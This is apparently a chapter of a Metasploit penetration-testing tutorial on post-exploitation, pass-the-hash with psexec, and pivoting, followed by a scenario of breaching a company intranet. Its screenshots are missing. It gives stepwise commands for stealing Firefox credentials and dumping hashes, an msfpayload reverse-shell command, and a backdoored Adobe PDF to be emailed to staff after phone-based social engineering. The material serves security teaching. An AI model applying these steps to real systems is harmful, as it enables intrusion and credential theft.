Post-Exploitation
Post Exploitation is an important process in any penetration test scenario as it allows the attacker
to extract information from the exploited system. Metasploit provides modules for Post Exploitation
activities for a variety of systems. In this section, we will examine how we can use Metasploit to
perform Post Exploitation.
For instance here, suppose that we want to extract all Firefox passwords from the exploited system,
Metasploit offers an – easy to use – module for that purpose:
“post/multi/gather/firefox_creds” is the right one for this specific task, so let’s use it:
For all Post Exploitation modules, you have to specify the SESSION id when you are trying to switch
the module on, you can get a list of all current sessions with the following command as we mentioned
earlier:
sessions -l
This demonstrated a simple Post Exploitation which is performed with MSF modules, it also offers a
huge number of modules which you can use. Typing the following command will show you a list of
all available modules for use:
show post
As follows:
Pass The Hash (PTH)
The psexec module is often used by penetration testers to obtain access to a given system that you
already know the credentials for. It was written by sysinternals and has been integrated within the
framework. Often as penetration testers, we successfully gain access to a system through some
exploit works, use meterpreter to grab the passwords or may be other methods like fgdump, pwdump,
or cachedump and then utilize rainbowtables to crack those hash values.
One great method with psexec in Metasploit is to allow you enter the password itself, or you can
simply just specify the hash values, no need to crack for gaining access to the system, let’s see some
examples of that:
First, let’s say you have meterpreter shell access to the target system:
We can also see that the compromised machine has a 2nd network adapter that is connected to the
192.168.1.0/24 CIDR so let’s pivot and scan that network for hosts:
We can also see that the compromised machine has a 2nd network adapter connected to the
192.168.1.0/24 CIDR so let’s pivot and scan that network for hosts:
And once we added the route, we will be able to scan the 2nd network, we’ll use “auxiliary/
scanner/portscan/tcp” for this purpose:
We have detected an SMB “Samba” service running on the “192.168.1.101”. However, the system
is patched. Hence, we tried all possible remote exploits but we couldn’t get a shell on that, but
since it’s being on the same network as the compromised one then it’s more likely that it’s already
authenticated to the 2nd target system and the local user “nasro” has an account there as well.
This gives us an idea of using psexec tool to run Metasploit “.exe” on the 192.168.1.101 host, but
remember that we only have the hash and not the plaintext password for “nasro” user.
Well, you don’t have to worry about cracking it (which may take days, weeks to years ..), because
psexec supports Pass-The-Hash attack, so we will only have to send the user the hash as a “SMBPass” parameters and the attack will successfully work out:
We got the hash now, so let’s use the psexec module, so we should set the current meterpreter
sessions to the background by (CTRL + Z):
Now, you should set the following parameters:
Now, you should lunch the attack by typing “exploit” and when you hit enter the magic begins to
show and MSF will give us a meterpreter sessions to the 2nd target.
Penetration Testing Scenarios
In this scenario, we will penetrate an enterprise intranet and penetrate some critical systems
(Accounting and Sales) which in real world cases are very valuable for enterprise spying, this one
hired us to make a penetration testing on its network in order to build a report of vulnerable points in
their systems, so they could fix it before attackers get use of them.
PN:
In this section, We will use all what we have leaned in this entire workshop.
The pen test operation will be broken down to 4 major phases as follows:
• Information Gathering
• Sending a backdoor file to the customer service
• Pivoting and scanning internal networks
• Getting access to the intranet
Information Gathering (1)
We have done some info gathering and social engineered the customer service over the phone and
here is a list of elements we found out:
• Windows XP is the one in place
• They are using outdated version of Adobe Reader (v9)
• Firewall is operational and it’s only allowing outbound HTTP requests from the network
These two pieces of information are VERY useful in order to conduct a successful attack, let’s get
to work.
First, we were able to find out that the customer service computer is using and outdated version
of Adobe Reader so we can generate a backdoor PDF file that will initiate a reverse HTTP connection
to our attacking machine.
We can use those pieces of info in a simple nice diagram just to keep things clear:
Now let’s create the backdoor PDF file inside MSF as follows:
By typing “search adobe”, we will have quite a lot of exploits to chose from:
After we have chosen the “exploit/windows/fileformat/adobe_pdf_embedded_exe”, It should be
rated as “Excellent” and it applies to the version that the victim is using: (v9)
Then, we use the exploit by typing “use exploit/windows/fileformat/adobe_pdf_embedded_exe”.
After that, we should type the “show options” command to find out what parameters we should fill:
And for this exploit to work correctly, we need to specify the following parameters:
First, we will generate The EXENAME using the following command as follows:
“msfpayload windows/meterpreter/reverse_tcp LHOST=”YOUR_IP” LPORT=80 X > hello2.exe “
Secondly for the INFILENAME, you will need to create a PDF file or download some from the internet, Google is your best choice .. then just enter “filetype:pdf” and a list of them will show up as following:
Now, we have everything, let’s make that exploit work:
Once you filled all the parameters, just type “run” and the evil PDF file will be created and you should be ready to send it to the victim (customer service) via email with some good message to give him a reason to open it.
Now launch your handler, sit back and wait for the shell to come:
And by typing “route” command, we can clearly see that there are two interfaces there!! the second
one is probably for the INTRANET that we are after as in the following figure:
Pivoting and some scanning can help us find out things more, so let’s setup a route to
the 2nd interface:
And now, we should chose the “scanner/portscan/tcp” auxiliary to scan the 2nd interface we routed to:
We are after the 445 port (samba) from beginning because we want to test Pass-The-Hash attack on
the other hosts just before everything:
As you can see, we identified two computers on the INTRANET and they have SHARE open, let’s see if we can get in from there.
But first, we must “hashdump” on the 1st exploited machine (customer service) and use those
hashes to conduct a pass-the-hash attack on the “192.168.1.103”:
Let’s get back to our session:
Once you obtain the hashes, get out gain (CTRL + Z) and use the psexec auxiliary to conduct the
PTH attack:
Now we enter the parameters as you can see:
Also chosen the “bind_tcp” meterpreter because the INTRANET is not connected the internet
and we will only be able to do “reverse_tcp” with some extra portfwd relays so why make it the hard
way when you can get it in easily.
When you type “exploit” and hit enter, you won’t be able to see a meterpreter sessions but it’s there
waiting for you to connect on port 4444.
Let’s get back to our previous sessions, we will issue this command that is going to do the forward
process for us:
L: The local host IP (localhost:127.0.0.1), we’re going to use it in order to get connected to the
target host
l: The local port that we’re going to use in order to get connected to the target host
r: The remote that host is to connect to
p: The remote port to connect to (the bind_tcp port that we set to the exploit in our case)
Once it is done, we’re going to use the “multi/handler” with payload “windows/meterpreter/bind_tcp”
and parameters: LHOST: 127.0.0.1, PORT: 4444 as we set the forward earlier:
As you type “run” and hit enter, the forwarding magic is going to work on the background and the
payload is going to get connected to the remote host “192.168.1.103” on port 4444.
Once that’s done, you’re should see the following:
Metepreter session 2 is opened and host 192.168.1.103 has been compromised, you can do further
Post Exploitation there and extract everything from that host.
Now, we’re going to move to the 3rd machine “192.168.1.101”, at first I wanted to try the netapi
exploit and see if the host is vulnerable, it’s also an easy way to get in.
So, Put the 2nd metrepreter session to the background (CTRL + Z) and use the netapi for 3rd host
as follows:
Also, you should make sure to fill the RHOST parameter to ”192.168.1.101” and chose the “windows/meterpreter/bind_tcp” payload with RHOST also equal to ”192.168.1.101” (the 3rd target). Once you did that and hit the “run” command, the host was compromised successfully.
So in conclusion, here is the network map that we constructed in this section:
Conclusion
Finally, we are ready to begin writing the report of all hosts we compromised and the existing
vulnerabilities. Also, we can make our report more rich with some confidential files, that way we
inform the client that the weakest point is the “Customer service” and from there we were able to gain access to all internal machines.